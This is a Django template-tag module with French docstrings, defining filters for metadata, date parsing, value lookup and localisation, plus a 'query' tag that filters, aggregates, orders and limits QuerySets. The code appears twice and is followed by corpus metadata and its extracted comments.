# coding: utf-8 from django.http import QueryDict from django.template import Library from django.utils.formats import localize register = Library() @register.filter(name='meta') def filter_meta(instance, key): """ Récupération d'une métadonnée sur une instance :param key: Clé :return: Valeur """ if hasattr(instance, 'get_metadata'): return instance.get_metadata(key) return None @register.filter(name='parsedate') def filter_parsedate(value, options=''): """ Parse une date ou un datetime dans n'importe quel format :param value: Date ou datetime au format texte :param options: Options de parsing (au format query string) :return: Date ou datetime """ from common.utils import parsedate options = QueryDict(options) return parsedate(value, **options) @register.filter(name='get') def filter_get(value, key): """ Permet de récupérer une valeur depuis un objet quelconque :param value: Objet :param key: Clé ou index :return: Valeur """ try: if isinstance(value, dict): return value.get(key) or value.get(int(key)) elif isinstance(value, (list, tuple)): return value[int(key)] else: return getattr(value, key, None) except ValueError: return None @register.filter(name='localize') def filter_localize(value, use_l10n=None): """ Localise une valeur brute :param value: Valeur :param use_l10n: Force ou non la localisation :return: Valeur localisée (si possible) """ return localize(value, use_l10n=use_l10n) or value @register.simple_tag(name='query', takes_context=True) def tag_query(context, queryset, save='', **kwargs): """ Permet de faire des opérations complémentaires sur un QuerySet :param context: Contexte local :param queryset: QuerySet :param save: Nom du contexte qui contiendra le nouveau QuerySet :param kwargs: Options de filtre/tri/etc... 
:return: Rien """ from common.api.utils import url_value, AGGREGATES from django.db.models import F, QuerySet if not isinstance(queryset, QuerySet): return queryset # Fonction de récupération des données depuis les paramètres def get(name): return kwargs.get(name, '').replace('.', '__').replace(' ', '') reserved_keywords = ( 'filters', 'fields', 'order_by', 'group_by', 'distinct', 'select_related', 'prefetch_related', 'limit', ) + tuple(AGGREGATES.keys()) # Filtres (dans une fonction pour être appelé par les aggregations sans group_by) def do_filter(queryset): filters = {} excludes = {} for key, value in kwargs.items(): if key in reserved_keywords: continue key = key.replace('.', '__') if isinstance(value, str) and value.startswith('(') and value.endswith(')'): value = F(value[1:-1]) if key.startswith('_'): key = key[1:] excludes[key] = url_value(key, value) else: key = key.strip() filters[key] = url_value(key, value) if filters: queryset = queryset.filter(**filters) if excludes: queryset = queryset.exclude(**excludes) # Filtres génériques others = kwargs.get('filters', None) if others: from common.api.utils import parse_filters queryset = queryset.filter(parse_filters(others)) return queryset # Jointures select_related = get('select_related') if select_related: queryset = queryset.select_related(*select_related.split(',')) prefetch_related = get('prefetch_related') if prefetch_related: queryset = queryset.prefetch_related(*prefetch_related.split(',')) # Aggregations aggregations = {} for aggregate, function in AGGREGATES.items(): for field in kwargs.get(aggregate, '').split(','): if not field: continue distinct = field.startswith(' ') field = field.strip().replace('.', '__') aggregations[field + '_' + aggregate] = function(field, distinct=distinct) group_by = get('group_by') if group_by: _queryset = queryset.values(*group_by.split(',')) if aggregations: _queryset = _queryset.annotate(**aggregations) else: _queryset = _queryset.distinct() queryset = _queryset elif 
aggregations: queryset = do_filter(queryset) # Filtres éventuels return queryset.aggregate(**aggregations) # Filtres queryset = do_filter(queryset) # Extraction de champs spécifiques fields = get('fields') if fields: # Supprime la récupération des relations queryset = queryset.select_related(None).prefetch_related(None) # Champs spécifiques relateds = set() field_names = set() for field in fields.split(','): if not field: continue field_names.add(field) *related, field_name = field.split('__') if related: relateds.add('__'.join(related)) if relateds: queryset = queryset.select_related(*relateds) if field_names: queryset = queryset.values_list(*field_names, named=True) # Tris order_by = get('order_by') if order_by: _queryset = queryset.order_by(*order_by.split(',')) str(_queryset.query) # Force SQL evaluation to retrieve exception queryset = _queryset # Distinct distinct = get('distinct') if distinct: if distinct is True: distincts = () else: distincts = distinct.split(',') queryset = queryset.distinct(*distincts) # Limite limit = get('limit') if limit: limit = [int(l) for l in limit.split(',')] limit_inf, limit_sup = (0, limit[0]) if len(limit) == 1 else limit[:2] queryset = queryset[limit_inf:limit_sup] context[save] = queryset return ''
# coding: utf-8 from django.http import QueryDict from django.template import Library from django.utils.formats import localize register = Library() @register.filter(name='meta') def filter_meta(instance, key): """ Récupération d'une métadonnée sur une instance :param key: Clé :return: Valeur """ if hasattr(instance, 'get_metadata'): return instance.get_metadata(key) return None @register.filter(name='parsedate') def filter_parsedate(value, options=''): """ Parse une date ou un datetime dans n'importe quel format :param value: Date ou datetime au format texte :param options: Options de parsing (au format query string) :return: Date ou datetime """ from common.utils import parsedate options = QueryDict(options) return parsedate(value, **options) @register.filter(name='get') def filter_get(value, key): """ Permet de récupérer une valeur depuis un objet quelconque :param value: Objet :param key: Clé ou index :return: Valeur """ try: if isinstance(value, dict): return value.get(key) or value.get(int(key)) elif isinstance(value, (list, tuple)): return value[int(key)] else: return getattr(value, key, None) except ValueError: return None @register.filter(name='localize') def filter_localize(value, use_l10n=None): """ Localise une valeur brute :param value: Valeur :param use_l10n: Force ou non la localisation :return: Valeur localisée (si possible) """ return localize(value, use_l10n=use_l10n) or value @register.simple_tag(name='query', takes_context=True) def tag_query(context, queryset, save='', **kwargs): """ Permet de faire des opérations complémentaires sur un QuerySet :param context: Contexte local :param queryset: QuerySet :param save: Nom du contexte qui contiendra le nouveau QuerySet :param kwargs: Options de filtre/tri/etc... 
:return: Rien """ from common.api.utils import url_value, AGGREGATES from django.db.models import F, QuerySet if not isinstance(queryset, QuerySet): return queryset # Fonction de récupération des données depuis les paramètres def get(name): return kwargs.get(name, '').replace('.', '__').replace(' ', '') reserved_keywords = ( 'filters', 'fields', 'order_by', 'group_by', 'distinct', 'select_related', 'prefetch_related', 'limit', ) + tuple(AGGREGATES.keys()) # Filtres (dans une fonction pour être appelé par les aggregations sans group_by) def do_filter(queryset): filters = {} excludes = {} for key, value in kwargs.items(): if key in reserved_keywords: continue key = key.replace('.', '__') if isinstance(value, str) and value.startswith('(') and value.endswith(')'): value = F(value[1:-1]) if key.startswith('_'): key = key[1:] excludes[key] = url_value(key, value) else: key = key.strip() filters[key] = url_value(key, value) if filters: queryset = queryset.filter(**filters) if excludes: queryset = queryset.exclude(**excludes) # Filtres génériques others = kwargs.get('filters', None) if others: from common.api.utils import parse_filters queryset = queryset.filter(parse_filters(others)) return queryset # Jointures select_related = get('select_related') if select_related: queryset = queryset.select_related(*select_related.split(',')) prefetch_related = get('prefetch_related') if prefetch_related: queryset = queryset.prefetch_related(*prefetch_related.split(',')) # Aggregations aggregations = {} for aggregate, function in AGGREGATES.items(): for field in kwargs.get(aggregate, '').split(','): if not field: continue distinct = field.startswith(' ') field = field.strip().replace('.', '__') aggregations[field + '_' + aggregate] = function(field, distinct=distinct) group_by = get('group_by') if group_by: _queryset = queryset.values(*group_by.split(',')) if aggregations: _queryset = _queryset.annotate(**aggregations) else: _queryset = _queryset.distinct() queryset = _queryset elif 
aggregations: queryset = do_filter(queryset) # Filtres éventuels return queryset.aggregate(**aggregations) # Filtres queryset = do_filter(queryset) # Extraction de champs spécifiques fields = get('fields') if fields: # Supprime la récupération des relations queryset = queryset.select_related(None).prefetch_related(None) # Champs spécifiques relateds = set() field_names = set() for field in fields.split(','): if not field: continue field_names.add(field) *related, field_name = field.split('__') if related: relateds.add('__'.join(related)) if relateds: queryset = queryset.select_related(*relateds) if field_names: queryset = queryset.values_list(*field_names, named=True) # Tris order_by = get('order_by') if order_by: _queryset = queryset.order_by(*order_by.split(',')) str(_queryset.query) # Force SQL evaluation to retrieve exception queryset = _queryset # Distinct distinct = get('distinct') if distinct: if distinct is True: distincts = () else: distincts = distinct.split(',') queryset = queryset.distinct(*distincts) # Limite limit = get('limit') if limit: limit = [int(l) for l in limit.split(',')] limit_inf, limit_sup = (0, limit[0]) if len(limit) == 1 else limit[:2] queryset = queryset[limit_inf:limit_sup] context[save] = queryset return ''
fr
0.926917
# coding: utf-8 Récupération d'une métadonnée sur une instance :param key: Clé :return: Valeur Parse une date ou un datetime dans n'importe quel format :param value: Date ou datetime au format texte :param options: Options de parsing (au format query string) :return: Date ou datetime Permet de récupérer une valeur depuis un objet quelconque :param value: Objet :param key: Clé ou index :return: Valeur Localise une valeur brute :param value: Valeur :param use_l10n: Force ou non la localisation :return: Valeur localisée (si possible) Permet de faire des opérations complémentaires sur un QuerySet :param context: Contexte local :param queryset: QuerySet :param save: Nom du contexte qui contiendra le nouveau QuerySet :param kwargs: Options de filtre/tri/etc... :return: Rien # Fonction de récupération des données depuis les paramètres # Filtres (dans une fonction pour être appelé par les aggregations sans group_by) # Filtres génériques # Jointures # Aggregations # Filtres éventuels # Filtres # Extraction de champs spécifiques # Supprime la récupération des relations # Champs spécifiques # Tris # Force SQL evaluation to retrieve exception # Distinct # Limite
2.031891
2